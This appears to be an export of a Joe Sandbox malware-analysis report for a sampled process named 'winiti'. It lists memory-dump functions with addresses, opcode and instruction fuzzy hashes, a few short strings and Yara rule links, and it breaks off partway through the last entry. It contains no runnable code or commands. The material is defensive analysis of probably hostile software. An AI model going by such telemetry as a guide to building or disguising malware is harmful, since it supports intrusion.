Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: dfd2e6b934140c3a54b5e03def77cfeba6eeea92e940d9a4d209e3fd9f61967b
Instruction ID: 1cf6ca62573f99569496b83b83ed412acfd917d78773ada828267ec175b5622f
Opcode Fuzzy Hash: dfd2e6b934140c3a54b5e03def77cfeba6eeea92e940d9a4d209e3fd9f61967b
Instruction Fuzzy Hash: CF41AF70A0435ADFDB25CF74E9857AEBBB2FF85300F248529E405DB240DB39A946CB91

Function 002DE4B5 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

PHp, xrefs: 002DE603

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID: PHp
API String ID: 0-2495607638
Opcode ID: 11a8409e6c35ac77cae82490fa3c0a81c5936f0f2d992406a34e56b8af534f09
Instruction ID: e2138e10f7fd77adbb5adeba514f67db80c8afdfdeaee686a14f3e554904c0bf
Opcode Fuzzy Hash: 11a8409e6c35ac77cae82490fa3c0a81c5936f0f2d992406a34e56b8af534f09
Instruction Fuzzy Hash: C341D330B003028FCF55AF34E85976E3BA2AF89354B65896AD406CF395EE35CD06C795

Function 002D5C40 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

LRp, xrefs: 002D5CAD

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: 38c0c6771250e3ee49aca7e63a8b687489168fa406a99bea09b33ea1e36fb7ea
Instruction ID: cbd928ce303b725fd8ed99630f2be732d5c119ca034ea5a1e52910200e2fdff6
Opcode Fuzzy Hash: 38c0c6771250e3ee49aca7e63a8b687489168fa406a99bea09b33ea1e36fb7ea
Instruction Fuzzy Hash: 09314F70E2072A9BDB14CFA4D8447AEB7B2EF85311F60852BE406EB394D7B09D91CB50

Function 00722420 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

$p, xrefs: 00722475

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p
API String ID: 0-982128392
Opcode ID: 8c6259c6aa7c414a486857302dac83d7b3e461f5ab208eeeadc880a674907c87
Instruction ID: 189a13f6c84e6f977dc73e2d1d23cdcb8d0ff74e41bbd574959fd8a661a550a8
Opcode Fuzzy Hash: 8c6259c6aa7c414a486857302dac83d7b3e461f5ab208eeeadc880a674907c87
Instruction Fuzzy Hash: D9017B327043A0AFCF25AD61FD942A67B25EB90310F14407ACC02C3286DB78DE13C791

Function 002DE640 Relevance: 1.0, Instructions: 1003COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dfbb00a8d23f3d76ef43d676823724970423e0fd58bb15ff8aea67d90f731d3
Instruction ID: b4b4c4bb2584e771dc9c1d2445eb5bf9e21ccfb5a9e614290bbceee48c375c62
Opcode Fuzzy Hash: 5dfbb00a8d23f3d76ef43d676823724970423e0fd58bb15ff8aea67d90f731d3
Instruction Fuzzy Hash: 0C924734A10205CFDB64EF68C588AADB7F2EF49314F55886AD41AAF361DB35EC45CB40

Function 002D65C8 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bfe0a2e978b8053cdff76b10f8db09da024ddf135c7099a5fa9d5f3d05d4c1
Instruction ID: a42ed086d542f1f513fcc705dfb8d0f826c15c98c46b7c439bc5919d8a5b8f57
Opcode Fuzzy Hash: 53bfe0a2e978b8053cdff76b10f8db09da024ddf135c7099a5fa9d5f3d05d4c1
Instruction Fuzzy Hash: 99226B71710306DBDB16AB28E45926C37A2FBC5354B608C3AE045CB35ACF39EC869BD5

Function 002D8460 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b2723d82187f15cc2bb299225e0774cf0bf1c6d4fcedae562f9bca624473c8
Instruction ID: 76124c58d057def3534e4fab965ebaa008734396a68a9ab998da12da59438f9f
Opcode Fuzzy Hash: d3b2723d82187f15cc2bb299225e0774cf0bf1c6d4fcedae562f9bca624473c8
Instruction Fuzzy Hash: 26F1C034B1020A8FDB15DF68D894AADBBB2EF88310F64846AE405DB395DF34DD56CB81

Function 0072A0A7 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c5989ccb56cabde7d7302fb373492e60f03372582e4d078a97775c6927c8c3
Instruction ID: aeed9d69a7055eb5ec586386b78683eee52b4d9e5d5417326b749d00a2657648
Opcode Fuzzy Hash: b7c5989ccb56cabde7d7302fb373492e60f03372582e4d078a97775c6927c8c3
Instruction Fuzzy Hash: 99C16D34B0021A9FDB25EFA8E8946AEB7B2FF85310F108829D406D7754EB39DD468B51

Function 0072AC41 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d39caa3c516ba7d27fa98111efe3d776c83220e22d86f37a463c39d83c3992d5
Instruction ID: 42ef44fe22a38ffc4c266cb8cb76e7e93d01ecb3df75e79906d9216526addb71
Opcode Fuzzy Hash: d39caa3c516ba7d27fa98111efe3d776c83220e22d86f37a463c39d83c3992d5
Instruction Fuzzy Hash: ECB1B331A00329AFDF21DBA4D881BAEB772FF85310F118569E549DB240D778DD858B92

Function 0072A870 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3800df746f40dd230af61c96c29d9788acf49bec6950fedae6a375555d08b62
Instruction ID: 586863d421b4fc1b60eceff0d52d4d59fc3448c6ae6b381ddd14b09a1b267b5a
Opcode Fuzzy Hash: e3800df746f40dd230af61c96c29d9788acf49bec6950fedae6a375555d08b62
Instruction Fuzzy Hash: 58A1D631B00215AFDB24DF69D880B6EB7B2FF95320F21856AE159DB291D634EC81C792

Function 002D4514 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01eeeefa938063f44ae0d2689ff14f2cbda53011bbfc99b953f82cffb7a0d48a
Instruction ID: 52b3d2848fa170dea5353529c3762283f927882b29dff17d90f3c3c576098cb3
Opcode Fuzzy Hash: 01eeeefa938063f44ae0d2689ff14f2cbda53011bbfc99b953f82cffb7a0d48a
Instruction Fuzzy Hash: 9AB19C70E1020A8FDB10DFA8D88579DBBF6AF49354F24812AD815EB394EB74DC55CB81

Function 007210B8 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3151acc8e43a77413d2be98adcfc33d2101fd2647a5cb4d6d56ae0ea9756a6c1
Instruction ID: 7b95fd960ab9419a6f62d95f794c37bbcd95b5a02a269ca44d2cdb6a3b49e0b5
Opcode Fuzzy Hash: 3151acc8e43a77413d2be98adcfc33d2101fd2647a5cb4d6d56ae0ea9756a6c1
Instruction Fuzzy Hash: 48A16B30A00214DFCB14EB68E588B6DB7F2FF94314F948869E41AAB755DB39ED45CB80

Function 002D38FC Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a57a7843901e47ebee07cdf285eed952e30f2c2e99d3947e8340c9b6608f8e
Instruction ID: cd11fc42fb8354447b66a70cb2b00b4f65900623f3f58bc6c174a8854cb49d00
Opcode Fuzzy Hash: c8a57a7843901e47ebee07cdf285eed952e30f2c2e99d3947e8340c9b6608f8e
Instruction Fuzzy Hash: 1D917C70E1420A9FDF10CFA8C8857DDBBF1AF48304F14812AD445AB394EB749E56CB92

Function 002D8980 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8307bc784f60b4f31574ada003d113226b23b0332b2d38d7a52536ddfd363f53
Instruction ID: 377573bfeb8b9406cce508be9e10166b04c25b5312bd2812344a61b6b85396e3
Opcode Fuzzy Hash: 8307bc784f60b4f31574ada003d113226b23b0332b2d38d7a52536ddfd363f53
Instruction Fuzzy Hash: 56817CB1A102058FDB14DF68D884B9DBBB2FF88314F14C16AE909DB395EB719C45CB50

Function 00728EFF Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda2b4820bba9a9337248d166664561eb46f7dffc119771490ca24ecf254a1e3
Instruction ID: 46796b4b00cfc1dd01542e942b949a3f05f043073b7528e02646a21958bf6974
Opcode Fuzzy Hash: dda2b4820bba9a9337248d166664561eb46f7dffc119771490ca24ecf254a1e3
Instruction Fuzzy Hash: DE813A30A002199FCB14DBA9E985AAEB7F6EF84300F24C429E509AB355DB35ED46CB50

Function 00728F10 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a066e7960def91e69928870da6111cb45d6b7a6f31fefa39586a004014657fd8
Instruction ID: 71ae072c269c57fb3f1528e7b19cf05a505bb96b86eb17ff9c951dea9536bbf1
Opcode Fuzzy Hash: a066e7960def91e69928870da6111cb45d6b7a6f31fefa39586a004014657fd8
Instruction Fuzzy Hash: 55714C30A002599FDB14DBA9E984A9EBBF6EF84300F64C429E509EB355DB34ED46CB50

Function 00721434 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3a2875bbbc7eb3046428f008ec6d113e8dcd3f4a68f42d9c9ad27d85210f41
Instruction ID: e3372774f089202025266749b089d5dbd98507ae391d74a5981d6212f92648f9
Opcode Fuzzy Hash: 1c3a2875bbbc7eb3046428f008ec6d113e8dcd3f4a68f42d9c9ad27d85210f41
Instruction Fuzzy Hash: 08813870601254CFDB18EF69E594BAEB7B2BF94300F648529E4459B399CB35ED82CF80

Function 00729DD8 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965c74f3ed02dbdb198ee3ac6766fc9f2f852483268c89a02344bce8b7b28eaa
Instruction ID: 59adbae01f67a1092341ee6296e728c67a572d574fcd204abac84bc892fff96c
Opcode Fuzzy Hash: 965c74f3ed02dbdb198ee3ac6766fc9f2f852483268c89a02344bce8b7b28eaa
Instruction Fuzzy Hash: B9814A30A002199FCB15EBA4D494AAEB7F2FF84300F25C529D5169B395EB35ED86CB80

Function 00729DE8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66701182ea98849a9d8177bfa6e3b0a1f6ff041fe7db5191091616c2ff785da1
Instruction ID: 94c361f918f28ee2323f1e3b199da014028a4e883cc394b2ed2e421427576f1d
Opcode Fuzzy Hash: 66701182ea98849a9d8177bfa6e3b0a1f6ff041fe7db5191091616c2ff785da1
Instruction Fuzzy Hash: A2715C30A002199FCB15EFA4D494AAEB7F2FF84300F25C529D5169B395EB35ED86CB80

Function 002D127B Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd25c1d5d3c92d99889b7b633f205bf0a325fca51c486d82eaab6e4c2277e49
Instruction ID: bb81ec760226b18dd8d0c5ecdca34c2ea61752de932a4c31d76c48c314fc5e58
Opcode Fuzzy Hash: 3cd25c1d5d3c92d99889b7b633f205bf0a325fca51c486d82eaab6e4c2277e49
Instruction Fuzzy Hash: 3D61046161E3C16FDB136739A8642893F719F53314F4A00EBD081CFAB3E5198DA9C3A6

Function 002D4298 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c96b4fe03f3a214528a79b66f23ea790ce066122636b9409ffcbebc1766a875
Instruction ID: 0c8018ede64b811a07614be4d396b20fcad48408dca65f716399a135b45ad99e
Opcode Fuzzy Hash: 4c96b4fe03f3a214528a79b66f23ea790ce066122636b9409ffcbebc1766a875
Instruction Fuzzy Hash: F8715B70E1024A9FDF14DFA9C88579EBBF2BF88314F24812AE414AB354DB749C95CB91

Function 0072C2A8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651becef1f0b4f238ed8a3a1b9ae453cada582b731d821eae7d35c18b792a740
Instruction ID: b617daab00ee8950361cc9fb5df17f564ea8e2072e346934fde050c764077025
Opcode Fuzzy Hash: 651becef1f0b4f238ed8a3a1b9ae453cada582b731d821eae7d35c18b792a740
Instruction Fuzzy Hash: 3751BF34B00325DBDB16EB64E4946BEBBB2FFD8300B508929E40697355DF38ED468B91

Function 0072AF80 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2685691ebd912a2d0d888e183d70b76f25ededcecb54622f790e391d11356c
Instruction ID: abf8ae3d00ca8566b7c977e189f08a428ea5d39ff537c0bab23f6368239c6bd7
Opcode Fuzzy Hash: ff2685691ebd912a2d0d888e183d70b76f25ededcecb54622f790e391d11356c
Instruction Fuzzy Hash: 93518F71A002289FCB21CFA9D444B9EBBB5EF88310F14852AE909EB345D738DD05CB91

Function 0072C5EF Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc2ac6f56d485b102c19a7d12521e918eefb990a0d23b35e6e9d018996c0d2b9
Instruction ID: b8d2135716a6b56c85a602119b72907e5fbef07bc4ac67b4a0bb3c2faa65fabd
Opcode Fuzzy Hash: dc2ac6f56d485b102c19a7d12521e918eefb990a0d23b35e6e9d018996c0d2b9
Instruction Fuzzy Hash: B451FA347002204FEF26666CE494B7F365AD7A9710F24993AE40AD7789CE7DCD418BE2

Function 0072C600 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1298abcab80a18e1c913db093b3c9d2d23af9f9142fcde2ada4d46b7528aab32
Instruction ID: 230e7ec3859a659029c8a5ade0bff38753367a915db9568b0da60ba5c00bbbb4
Opcode Fuzzy Hash: 1298abcab80a18e1c913db093b3c9d2d23af9f9142fcde2ada4d46b7528aab32
Instruction Fuzzy Hash: CE51DC347002204BEF26666CE494B3F365AD7A9714F749936E50AC7788CE7DCD4187E2

Function 0072BEC9 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a1d643243f813f5cc097817dc3db81c80802e25ca26d7ad0202393e722fd22
Instruction ID: c90467539bfd48ec85c31dddca045c2683a312f5d02a0bb31fd062f313167008
Opcode Fuzzy Hash: 78a1d643243f813f5cc097817dc3db81c80802e25ca26d7ad0202393e722fd22
Instruction Fuzzy Hash: BF517B30A10215CFDB25DBA4E944BAEB7F2BF94300F24C569E4169B385DB75DD86CB80

Function 0072BED8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc2cf1ce7990a25e7b181af72c2abcf756ff3d6045c9a5b67fe897171b303390
Instruction ID: 37b59015cb1dda274189c4f6383a08e5aef6a992a97c6d4302bade2a80fe4d16
Opcode Fuzzy Hash: bc2cf1ce7990a25e7b181af72c2abcf756ff3d6045c9a5b67fe897171b303390
Instruction Fuzzy Hash: 47516E30A00215CFDB25DBA4E944BAEB7F2BF94300F248569E5169B345DB75DD86CB80

Function 00729B58 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13fbd7612f61587cd10aec50b92e158207caa09f9784ad9fcef08c65452042fd
Instruction ID: 1cbddf594e31cffd5e464a591d3fa2b2000ce7757d64cd055b9c8a5efe344770
Opcode Fuzzy Hash: 13fbd7612f61587cd10aec50b92e158207caa09f9784ad9fcef08c65452042fd
Instruction Fuzzy Hash: A431B270A1071A8FDB11EFA4E4406AEB7F2FF85300F548929D9059B254DB75ED46CB90

Function 002DE378 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b643dd115073c31049b6c29abbb51daa164e8dfb4e297bdff4831e3391abc487
Instruction ID: a14d454b2b75e2380f569171b56b9c9efa4d47e3a6475cf1c811e72f8fe745e8
Opcode Fuzzy Hash: b643dd115073c31049b6c29abbb51daa164e8dfb4e297bdff4831e3391abc487
Instruction Fuzzy Hash: C3319030E1020A9BDF19EF65D4946AEB7F2FF89310F11852AE816EB750DB71AC46CB50

Function 00729B68 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f3ce37959525d206bf6c3a202582c81d0e4ed6ae4d56edcd5bb41de761cec9
Instruction ID: bbab88f5bb61c79cc056ff2dacd632ca60b9a7e77366b3f88e972a10f01b1497
Opcode Fuzzy Hash: 44f3ce37959525d206bf6c3a202582c81d0e4ed6ae4d56edcd5bb41de761cec9
Instruction Fuzzy Hash: 3031B270A1071A8FDF11EFA4E44069EB7F2FF85300F548929E505AB204DB75ED46CB90

Function 002DE388 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18c46ca9d2c69bc85804d2573dbd6c2c84b1c2c9d7c2a18e430deadf244f4c98
Instruction ID: b42dd5c11d289136776f33222ebf33ef00caa00cfa1c58006870eaf9d8561373
Opcode Fuzzy Hash: 18c46ca9d2c69bc85804d2573dbd6c2c84b1c2c9d7c2a18e430deadf244f4c98
Instruction Fuzzy Hash: 23315E30A1020A9BDF19EF65D4946AEB7B2FF89310F118529E816EB754DB70AC46CB90

Function 002D2170 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196867d64cf81c24a0e39b9959023208b8384eb9103434e70d999b2db4638ad6
Instruction ID: cb712c5c01526fa590cd074d3abd8ffb2e604152df66660590ef83dd643ea6fb
Opcode Fuzzy Hash: 196867d64cf81c24a0e39b9959023208b8384eb9103434e70d999b2db4638ad6
Instruction Fuzzy Hash: 9D41E2B0D00349DFDB14CF99D884ADEBFB5AF48314F60842AE809AB354DB74A959CB90

Function 002DFD98 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f819903e42d9ec6ce6f99417ba4e547d7e8ffd19550cda2b74468e0d8b623f2
Instruction ID: 07f4f2d34ce5612fc9b3ee14ce7e6269fc1bdb942a0e7da10b9e92a5e0a220ca
Opcode Fuzzy Hash: 9f819903e42d9ec6ce6f99417ba4e547d7e8ffd19550cda2b74468e0d8b623f2
Instruction Fuzzy Hash: C5219C75F112059FDB54DF69E980BEEB7F1AB48710F108026E806E7355EB34DD418B90

Function 002DFDA8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c494e21cb8894a509d73def8fc685d22e8ab24e4f4fc1fe15729db715fd9c87
Instruction ID: caa19dfd650252b5015da0c4edbb65f055014dce87cc3097e77ad62a5f411f91
Opcode Fuzzy Hash: 3c494e21cb8894a509d73def8fc685d22e8ab24e4f4fc1fe15729db715fd9c87
Instruction Fuzzy Hash: 8521BA71F1120A8FDB50DF69E980BAEB7F1EB48310F108026E906E7355E730DD508B94

Function 002D7F40 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3666b759fa16b13385866a04f789191d00ae1d2daedeea5961549cd2d7ffd49
Instruction ID: 91f1465a7fb607d25f4e70bfb56d6b90baec5dd73aa01eccfc390644ca89ddf8
Opcode Fuzzy Hash: b3666b759fa16b13385866a04f789191d00ae1d2daedeea5961549cd2d7ffd49
Instruction Fuzzy Hash: 5A215E31E1420A9BDB15DFA4D4846AEF7B2FF89310F10C62AE805EB344EB759C96CB50

Function 0019D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.713974306.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_19d000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 366c8b69edde03fe8b14f692671afc6e46caaf6c901c18c5641783fca34c9d3d
Instruction ID: 318d1f220364db88f52179cd1329722b4412f1deb5bea5d64bbe73adff4f22e1
Opcode Fuzzy Hash: 366c8b69edde03fe8b14f692671afc6e46caaf6c901c18c5641783fca34c9d3d
Instruction Fuzzy Hash: A121C2B5604340EFDF15DF14E9C4B26BBA5EB84314F38C5AAE8494B256C33AD847CB62

Function 002D4E10 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964d61ddfeb4b72cb9b75aadee2df2626b78093dfb830087192894355da3a1ab
Instruction ID: 2b8bacc792d3b786459703756bdf20185f8366d50b68de96702bc385ff39d195
Opcode Fuzzy Hash: 964d61ddfeb4b72cb9b75aadee2df2626b78093dfb830087192894355da3a1ab
Instruction Fuzzy Hash: BC214634A10205DFDB14EB38D9A87AD7BF1BF4C305B2044A9D906EB3A0DB319D11CB61

Function 002D7E40 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba34ecf4ee323d32014f91ec897cc63be0be7a2a8461733a353095925ef49be6
Instruction ID: 74f033474953d72826a8052b9e48e81c47cca8bc013b8e143cf5a785490feb52
